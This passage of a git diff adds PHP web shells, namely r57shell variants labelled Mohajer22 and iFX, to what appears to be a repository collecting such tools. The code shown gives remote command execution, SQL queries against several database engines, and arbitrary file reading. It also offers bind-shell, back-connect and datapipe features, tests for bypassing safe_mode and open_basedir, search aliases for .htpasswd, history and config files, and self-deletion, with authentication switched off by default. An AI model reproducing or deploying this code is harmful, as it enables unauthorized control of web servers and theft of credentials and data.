sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru')); +echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667')); +echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5'])); +echo $te."</td>".$fe."</tr></div></table>"; +} +echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>o---[ r57shell - http-shell by RST/GHC | <a href=http://rst.void.ru>http://rst.void.ru</a> | <a href=http://ghc.ru>http://ghc.ru</a> | version ".$version." ]---o</b></font></div></td></tr></table>".$f; + +$u1p=""; // File to Include... or use _GET _POST +$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp + + + +echo "<PRE>\n"; +if(empty($u1p)){ +if(empty($_GET['u1p'])){ +if(empty($_POST['u1p'])){ +die("<FONT COLOR=\"RED\"><CENTER><span lang=\"ar-sa\">&#1578;&#1593;&#1583;&#1610;&#1604; &#1608;&#1578;&#1591;&#1608;&#1610;&#1585; </span>\ Mohajer22</CENTER></FONT>"); +} else { +$u1p=$_POST['u1p']; +} +} else { +$u1p=$_GET['u1p']; +} +} + +$temp=tempnam($tymczas, "cx"); + +if(copy("compress.zlib://".$u1p, $temp)){ +$zrodlo = fopen($temp, "r"); +$tekst = fread($zrodlo, filesize($temp)); +fclose($zrodlo); +echo "".htmlspecialchars($tekst).""; +unlink($temp); + +} else { +die("<FONT COLOR=\"RED\"><CENTER>Sorry... File +<B>".htmlspecialchars($u1p)."</B> dosen't exists or you don't have +access.</CENTER></FONT>"); +} + + + + + +?> + diff --git a/php/PHPshell/م€گr57_Mohajer22م€‘/r57_Mohajer222.jpg b/php/PHPshell/م€گr57_Mohajer22م€‘/r57_Mohajer222.jpg new file mode 100644 index 0000000..b3cfdd9 Binary files /dev/null and b/php/PHPshell/م€گr57_Mohajer22م€‘/r57_Mohajer222.jpg differ diff --git a/php/PHPshell/م€گr57_iFXم€‘/r57.jpg b/php/PHPshell/م€گr57_iFXم€‘/r57.jpg new file mode 100644 index 0000000..c4452dc Binary files /dev/null and b/php/PHPshell/م€گr57_iFXم€‘/r57.jpg differ diff --git a/php/PHPshell/م€گr57_iFXم€‘/r572.jpg b/php/PHPshell/م€گr57_iFXم€‘/r572.jpg new file mode 100644 index 0000000..58ffbe9 Binary files /dev/null and b/php/PHPshell/م€گr57_iFXم€‘/r572.jpg differ diff --git a/php/PHPshell/م€گr57_iFXم€‘/r57_iFX.php b/php/PHPshell/م€گr57_iFXم€‘/r57_iFX.php new file mode 100644 index 0000000..8badfc3 --- /dev/null +++ b/php/PHPshell/م€گr57_iFXم€‘/r57_iFX.php @@ -0,0 +1,1917 @@ +<?php +/******************************************************************************************************/ +/* +/* # # # # +/* # # # # +/* # # # # +/* # ## #### ## # +/* ## ## ###### ## ## +/* ## ## ###### ## ## +/* ## ## #### ## ## +/* ### ############ ### +/* ######################## +/* ############## +/* ######## ########## ####### +/* ### ## ########## ## ### +/* ### ## ########## ## ### +/* ### # ########## # ### +/* ### ## ######## ## ### +/* ## # ###### # ## +/* ## # #### # ## +/* ## ## +/* +/* +/* +/* r57shell.php - ?????? ?? ??? ??????????? ??? ????????? ???? ??????? ?? ??????? ????? ??????? +/* ?? ?????? ??????? ????? ?????? ?? ????? ?????: http://rst.void.ru +/* ??????: 1.23 +/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ +/* (c)oded by 1dt.w0lf +/* RST/GHC http://rst.void.ru , http://ghc.ru +/* ANY MODIFIED REPUBLISHING IS RESTRICTED +/******************************************************************************************************/ +//di modif ama pluto +//di modif lagi ama iFX + + +error_reporting(0); +set_magic_quotes_runtime(0); +@set_time_limit(0); +@ini_set('max_execution_time',0); +@ini_set('output_buffering',0); +$safe_mode = @ini_get('safe_mode'); +$version = " ~Alissa~"; +if(version_compare(phpversion(), '4.1.0') == -1) + { + $_POST = &$HTTP_POST_VARS; + $_GET = &$HTTP_GET_VARS; + $_SERVER = &$HTTP_SERVER_VARS; + } +if (@get_magic_quotes_gpc()) + { + foreach ($_POST as $k=>$v) + { + $_POST[$k] = stripslashes($v); + } + foreach ($_SERVER as $k=>$v) + { + $_SERVER[$k] = stripslashes($v); + } + } + +/* ~~~ ?????????????? ~~~ */ + +// $auth = 1; - ?????????????? ???????? +// $auth = 0; - ?????????????? ????????? +$auth = 0; + +// ????? ? ?????? ??? ??????? ? ??????? +// ?? ???????? ??????? ????? ??????????? ?? ???????!!! +$name=''; // ????? ???????????? +$pass=''; // ?????? ???????????? + +if($auth == 1) { +if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass) + { + header('WWW-Authenticate: Basic realm="Modified By iFX"'); + header('HTTP/1.0 401 Unauthorized'); + exit("<b><a href=http://lintah-club.ueuo.com>HELLW access denied tau'!!!, soryy neeh cuy!! :D</a> : Access Denied</b>"); + } +} +$head = '<!-- ?????????? ???? --> +<html> +<head> +<title>:: The r57 shell with modified by iFX :: listening L\'Arc~en~Ciel - MilkyWay::</title> +<meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> + +<STYLE> +body,td,th { +color: #00FF00; +} +tr { +BORDER-RIGHT: #000000 1px solid; +BORDER-TOP: #97C296 1px solid; +BORDER-LEFT: #97C296 1px solid; +BORDER-BOTTOM: #000E6A 1px solid; +} +td { +BORDER-RIGHT: #000000 1px solid; +BORDER-TOP: #97C296 1px solid; +BORDER-LEFT: #97C296 1px solid; +BORDER-BOTTOM: #000000 1px solid; +} +.table1 { +BORDER-RIGHT: #333333 0px; +BORDER-TOP: #97C296 0px; +BORDER-LEFT: #97C296 0px; +BORDER-BOTTOM: #333333 0px; +BACKGROUND-COLOR: #000000; +} +.td1 { +BORDER-RIGHT: #333333 0px; +BORDER-TOP: #97C296 0px; +BORDER-LEFT: #97C296 0px; +BORDER-BOTTOM: #333333 0px; +font: 7pt Verdana; +} +.tr1 { + +BORDER-RIGHT: #333333 0px; +BORDER-TOP: #333333 0px; +BORDER-LEFT: #333333 0px; +BORDER-BOTTOM: #333333 0px; +} +table { +BORDER-RIGHT: #97C296 1px outset; +BORDER-TOP: #97C296 1px outset; +BORDER-LEFT: #97C296 1px outset; +BORDER-BOTTOM: #97C296 1px outset; +BACKGROUND-COLOR: #004F0A; +} +input { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #00CA0B 1px solid; +BORDER-LEFT: #00CA0B 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #004F0A; +font: 8pt Verdana; +color : #FFFFFF; +} +select { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #00CA0B 1px solid; +BORDER-LEFT: #00CA0B 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #004F0A; +font: 8pt Verdana; +color:#80DBEE +} +submit { +BORDER-RIGHT: buttonhighlight 2px outset; +BORDER-TOP: buttonhighlight 2px outset; +BORDER-LEFT: buttonhighlight 2px outset; +BORDER-BOTTOM: buttonhighlight 2px outset; +BACKGROUND-COLOR: #004F0A; +width: 30%; +} +textarea { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #00CA0B 1px solid; +BORDER-LEFT: #00CA0B 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #004F0A; +font: Fixedsys bold; +color:#E49F1F; +} +BODY { +margin-top: 1px; +margin-right: 1px; +margin-bottom: 1px; +margin-left: 1px; +background-color: #000000; +} + +A:link {COLOR: #97C296; TEXT-DECORATION: none} +A:visited { COLOR: #2BE421; TEXT-DECORATION: none} +A:active {COLOR: #000099; TEXT-DECORATION: none} +A:hover {color: #2FADD7; TEXT-DECORATION: underline} +</STYLE>'; +if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); } +if ($_POST['cmd']=="db_query") + { + echo $head; + switch($_POST['db']) + { + case 'MySQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; } + $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + if(!empty($_POST['mysql_db'])) { @mysql_select_db($_POST['mysql_db'],$db); } + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5){ + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; + $res = @mysql_query($query,$db); + $error = @mysql_error($db); + if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; } + else { + if (@mysql_num_rows($res) > 0) + { + $sql2 = $sql = $keys = $values = ''; + while (($row = @mysql_fetch_assoc($res))) + { + $keys = @implode("&nbsp;</b></font></td><td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} + $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values); + $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>"; + } + echo "<table width=100%>"; + $sql = "<tr><td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; + $sql .= $sql2; + echo $sql; + echo "</table><br>"; + } + else { if(($rows = @mysql_affected_rows($db))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } } + } + @mysql_free_result($res); + } + } + @mysql_close($db); + } + else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MySQL server</b></font></div>"; + break; + case 'MSSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; } + $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); } + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5){ + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; + $res = @mssql_query($query,$db); + if (@mssql_num_rows($res) > 0) + { + $sql2 = $sql = $keys = $values = ''; + while (($row = @mssql_fetch_assoc($res))) + { + $keys = @implode("&nbsp;</b></font></td><td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} + $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values); + $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>"; + } + echo "<table width=100%>"; + $sql = "<tr><td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; + $sql .= $sql2; + echo $sql; + echo "</table><br>"; + } + /* else { if(($rows = @mssql_affected_rows($db)) > 0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } else { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }} */ + @mssql_free_result($res); + } + } + @mssql_close($db); + } + else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MSSQL server</b></font></div>"; + break; + case 'PostgreSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; } + $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'"; + $db = @pg_connect($str); + if($db) + { + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5){ + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; + $res = @pg_query($db,$query); + $error = @pg_errormessage($db); + if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; } + else { + if (@pg_num_rows($res) > 0) + { + $sql2 = $sql = $keys = $values = ''; + while (($row = @pg_fetch_assoc($res))) + { + $keys = @implode("&nbsp;</b></font></td><td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} + $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values); + $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>"; + } + echo "<table width=100%>"; + $sql = "<tr><td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; + $sql .= $sql2; + echo $sql; + echo "</table><br>"; + } + else { if(($rows = @pg_affected_rows($res))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } } + } + @pg_free_result($res); + } + } + @pg_close($db); + } + else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to PostgreSQL server</b></font></div>"; + break; + case 'Oracle': + $db = @ocilogon($_POST['mysql_l'], $_POST['mysql_p'], $_POST['mysql_db']); + if(($error = @ocierror())) { echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to Oracle server.<br>".$error['message']."</b></font></div>"; } + else + { + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5) { + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; + $stat = @ociparse($db, $query); + @ociexecute($stat); + if(($error = @ocierror())) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error['message']."</b></font></td></tr></table><br>"; } + else + { + $rowcount = @ocirowcount($stat); + if($rowcount != 0) {echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rowcount."</b></font></td></tr></table><br>";} + else { + echo "<table width=100%><tr>"; + for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td bgcolor=#333333><font face=Verdana size=-2><b>&nbsp;".htmlspecialchars(@ocicolumnname($stat, $j))."&nbsp;</b></font></td>"; } + echo "</tr>"; + while(ocifetch($stat)) + { + echo "<tr>"; + for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td><font face=Verdana size=-2>&nbsp;".htmlspecialchars(@ociresult($stat, $j))."&nbsp;</font></td>"; } + echo "</tr>"; + } + echo "</table><br>"; + } + @ocifreestatement($stat); + } + } + } + @ocilogoff($db); + } + break; + } + echo "<form name=form method=POST>"; + echo in('hidden','db',0,$_POST['db']); + echo in('hidden','db_port',0,$_POST['db_port']); + echo in('hidden','mysql_l',0,$_POST['mysql_l']); + echo in('hidden','mysql_p',0,$_POST['mysql_p']); + echo in('hidden','mysql_db',0,$_POST['mysql_db']); + echo in('hidden','cmd',0,'db_query'); + echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; + echo "</form>"; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); + } +if(isset($_GET['delete'])) + { + @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1)); + } +if(isset($_GET['tmp'])) + { + @unlink("/tmp/bdpl"); + @unlink("/tmp/back"); + @unlink("/tmp/bd"); + @unlink("/tmp/bd.c"); + @unlink("/tmp/dp"); + @unlink("/tmp/dpc"); + @unlink("/tmp/dpc.c"); + } +if(isset($_GET['phpini'])) +{ +echo $head; +function U_value($value) + { + if ($value == '') return '<i>no value</i>'; + if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; + if ($value === null) return 'NULL'; + if (@is_object($value)) $value = (array) $value; + if (@is_array($value)) + { + @ob_start(); + print_r($value); + $value = @ob_get_contents(); + @ob_end_clean(); + } + return U_wordwrap((string) $value); + } +function U_wordwrap($str) + { + $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true); + return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str); + } +if (@function_exists('ini_get_all')) + { + $r = ''; + echo '<table width=100%>', '<tr><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>'; + foreach (@ini_get_all() as $key=>$value) + { + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>'; + } + echo $r; + echo '</table>'; + } +echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; +die(); +} +if(isset($_GET['cpu'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>'; + $cpuf = @file("cpuinfo"); + if($cpuf) + { + $c = @sizeof($cpuf); + for($i=0;$i<$c;$i++) + { + $info = @explode(":",$cpuf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +if(isset($_GET['mem'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>'; + $memf = @file("meminfo"); + if($memf) + { + $c = sizeof($memf); + for($i=0;$i<$c;$i++) + { + $info = explode(":",$memf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +/* +????? ????? +$language='ru' - ??????? +$language='eng' - ?????????? +*/ +$language='eng'; +$lang=array( +'ru_text1' =>'??????????? ???????', +'ru_text2' =>'?????????? ?????? ?? ???????', +'ru_text3' =>'????????? ???????', +'ru_text4' =>'??????? ??????????', +'ru_text5' =>'???????? ?????? ?? ??????', +'ru_text6' =>'????????? ????', +'ru_text7' =>'??????', +'ru_text8' =>'???????? ?????', +'ru_butt1' =>'?????????', +'ru_butt2' =>'?????????', +'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash', +'ru_text10'=>'??????? ????', +'ru_text11'=>'?????? ??? ???????', +'ru_butt3' =>'???????', +'ru_text12'=>'back-connect', +'ru_text13'=>'IP-?????', +'ru_text14'=>'????', +'ru_butt4' =>'?????????', +'ru_text15'=>'???????? ?????? ? ?????????? ???????', +'ru_text16'=>'????????????', +'ru_text17'=>'????????? ????', +'ru_text18'=>'????????? ????', +'ru_text19'=>'Exploits', +'ru_text20'=>'????????????', +'ru_text21'=>'????? ???', +'ru_text22'=>'datapipe', +'ru_text23'=>'????????? ????', +'ru_text24'=>'????????? ????', +'ru_text25'=>'????????? ????', +'ru_text26'=>'????????????', +'ru_butt5' =>'?????????', +'ru_text28'=>'?????? ? safe_mode', +'ru_text29'=>'?????? ????????', +'ru_butt6' =>'???????', +'ru_text30'=>'???????? ?????', +'ru_butt7' =>'???????', +'ru_text31'=>'???? ?? ??????', +'ru_text32'=>'?????????? PHP ????', +'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL', +'ru_butt8' =>'?????????', +'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include', +'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql', +'ru_text36'=>'????', +'ru_text37'=>'?????', +'ru_text38'=>'??????', +'ru_text39'=>'???????', +'ru_text40'=>'???? ??????? ???? ??????', +'ru_butt9' =>'????', +'ru_text41'=>'????????? ? ?????', +'ru_text42'=>'?????????????? ?????', +'ru_text43'=>'????????????? ????', +'ru_butt10'=>'?????????', +'ru_butt11'=>'?????????????', +'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!', +'ru_text45'=>'???? ????????', +'ru_text46'=>'???????? phpinfo()', +'ru_text47'=>'???????? ???????? php.ini', +'ru_text48'=>'???????? ????????? ??????', +'ru_text49'=>'???????? ??????? ? ???????', +'ru_text50'=>'?????????? ? ??????????', +'ru_text51'=>'?????????? ? ??????', +'ru_text52'=>'????? ??? ??????', +'ru_text53'=>'?????? ? ?????', +'ru_text54'=>'????? ?????? ? ??????', +'ru_butt12'=>'?????', +'ru_text55'=>'?????? ? ??????', +'ru_text56'=>'?????? ?? ???????', +'ru_text57'=>'???????/??????? ????/??????????', +'ru_text58'=>'???', +'ru_text59'=>'????', +'ru_text60'=>'??????????', +'ru_butt13'=>'???????/???????', +'ru_text61'=>'???? ??????', +'ru_text62'=>'?????????? ???????', +'ru_text63'=>'???? ??????', +'ru_text64'=>'?????????? ???????', +'ru_text65'=>'???????', +'ru_text66'=>'???????', +'ru_text67'=>'Chown/Chgrp/Chmod', +'ru_text68'=>'???????', +'ru_text69'=>'????????1', +'ru_text70'=>'????????2', +'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)", +'ru_text72'=>'????? ??? ??????', +'ru_text73'=>'?????? ? ?????', +'ru_text74'=>'?????? ? ??????', +'ru_text75'=>'* ????? ???????????? ?????????? ?????????', +'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find', +'ru_text77'=>'???????? ????????? ???? ??????', +'ru_text78'=>'?????????? ???????', +'ru_text79'=>'?????????? ???????', +'ru_text80'=>'???', +'ru_text81'=>'????', +'ru_text82'=>'???? ??????', +'ru_text83'=>'?????????? SQL ???????', +'ru_text84'=>'SQL ??????', +'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????', +/* --------------------------------------------------------------- */ +'eng_text1' =>'Sikat..!!', +'eng_text2' =>'Running..di server', +'eng_text3' =>'Jalankan perintah', +'eng_text4' =>'Direktori Skrg', +'eng_text5' =>'Upload files ke server', +'eng_text6' =>'Local file', +'eng_text7' =>'Aliases', +'eng_text8' =>'Select alias', +'eng_butt1' =>'Sikat', +'eng_butt2' =>'Upload', +'eng_text9' =>'Bind port to /bin/bash', +'eng_text10'=>'Port', +'eng_text11'=>'Password untuk', +'eng_butt3' =>'Bind', +'eng_text12'=>'back-connect', +'eng_text13'=>'IP', +'eng_text14'=>'Port', +'eng_butt4' =>'Connect', +'eng_text15'=>'Upload files from remote server', +'eng_text16'=>'With', +'eng_text17'=>'Remote file', +'eng_text18'=>'Local file', +'eng_text19'=>'Exploits', +'eng_text20'=>'Use', +'eng_text21'=>'&nbsp;New name', +'eng_text22'=>'datapipe', +'eng_text23'=>'Local port', +'eng_text24'=>'Remote host', +'eng_text25'=>'Remote port', +'eng_text26'=>'Use', +'eng_butt5' =>'Run', +'eng_text28'=>'Work in safe_mode', +'eng_text29'=>'ACCESS DENIED', +'eng_butt6' =>'Change', +'eng_text30'=>'Cat file', +'eng_butt7' =>'Show', +'eng_text31'=>'File not found', +'eng_text32'=>'Eval PHP code', +'eng_text33'=>'Test bypass open_basedir with cURL functions', +'eng_butt8' =>'Test', +'eng_text34'=>'Test bypass safe_mode with include function', +'eng_text35'=>'Test bypass safe_mode with load file in mysql', +'eng_text36'=>'Database', +'eng_text37'=>'Login', +'eng_text38'=>'Password', +'eng_text39'=>'Table', +'eng_text40'=>'Dump database table', +'eng_butt9' =>'Dump', +'eng_text41'=>'Save dump in file', +'eng_text42'=>'Edit files', +'eng_text43'=>'File for edit', +'eng_butt10'=>'Save', +'eng_text44'=>'Can\'t edit file! Only read access!', +'eng_text45'=>'File saved', +'eng_text46'=>'Show phpinfo()', +'eng_text47'=>'Show variables from php.ini', +'eng_text48'=>'Delete temp files', +'eng_butt11'=>'Edit file', +'eng_text49'=>'Delete script from server', +'eng_text50'=>'View cpu info', +'eng_text51'=>'View memory info', +'eng_text52'=>'Find text', +'eng_text53'=>'In dirs', +'eng_text54'=>'Find text in files', +'eng_butt12'=>'Find', +'eng_text55'=>'Only in files', +'eng_text56'=>'Nothing :(', +'eng_text57'=>'Create/Delete File/Dir', +'eng_text58'=>'name', +'eng_text59'=>'file', +'eng_text60'=>'dir', +'eng_butt13'=>'Create/Delete', +'eng_text61'=>'File created', +'eng_text62'=>'Dir created', +'eng_text63'=>'File deleted', +'eng_text64'=>'Dir deleted', +'eng_text65'=>'Create', +'eng_text66'=>'Delete', +'eng_text67'=>'Chown/Chgrp/Chmod', +'eng_text68'=>'Command', +'eng_text69'=>'param1', +'eng_text70'=>'param2', +'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", +'eng_text72'=>'Text for find', +'eng_text73'=>'Find in folder', +'eng_text74'=>'Find in files', +'eng_text75'=>'* you can use regexp', +'eng_text76'=>'Search text in files via find', +'eng_text77'=>'Show database structure', +'eng_text78'=>'show tables', +'eng_text79'=>'show columns', +'eng_text80'=>'Type', +'eng_text81'=>'Net', +'eng_text82'=>'Databases', +'eng_text83'=>'Run SQL query', +'eng_text84'=>'SQL query', +); +/* +?????? ?????? +????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? ) +?? ?????? ???? ????????? ??? ???????? ???????. +*/ +$aliases=array( +'find suid files'=>'find / -type f -perm -04000 -ls', +'find suid files in current dir'=>'find . -type f -perm -04000 -ls', +'find sgid files'=>'find / -type f -perm -02000 -ls', +'find sgid files in current dir'=>'find . -type f -perm -02000 -ls', +'find config.inc.php files'=>'find / -type f -name config.inc.php', +'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php', +'find config* files'=>'find / -type f -name "config*"', +'find config* files in current dir'=>'find . -type f -name "config*"', +'find all writable files'=>'find / -type f -perm -2 -ls', +'find all writable files in current dir'=>'find . -type f -perm -2 -ls', +'find all writable directories'=>'find / -type d -perm -2 -ls', +'find all writable directories in current dir'=>'find . -type d -perm -2 -ls', +'find all writable directories and files'=>'find / -perm -2 -ls', +'find all writable directories and files in current dir'=>'find . -perm -2 -ls', +'find all service.pwd files'=>'find / -type f -name service.pwd', +'find service.pwd files in current dir'=>'find . -type f -name service.pwd', +'find all .htpasswd files'=>'find / -type f -name .htpasswd', +'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd', +'find all .bash_history files'=>'find / -type f -name .bash_history', +'find .bash_history files in current dir'=>'find . -type f -name .bash_history', +'find all .mysql_history files'=>'find / -type f -name .mysql_history', +'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history', +'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc', +'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc', +'list file attributes on a Linux second extended file system'=>'lsattr -va', +'show opened ports'=>'netstat -an | grep -i listen', +'----------------------------------------------------------------------------------------------------'=>'ls -la' +); +$table_up1 = "<tr><td bgcolor=#333333><font face=Verdana size=-2><b><div align=center>:: "; +$table_up2 = " ::</div></b></font></td></tr><tr><td>"; +$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333>"; +$table_end1 = "</td></tr>"; +$arrow = " <font face=Wingdings color=gray>?</font>"; +$lb = "<font color=black>[</font>"; +$rb 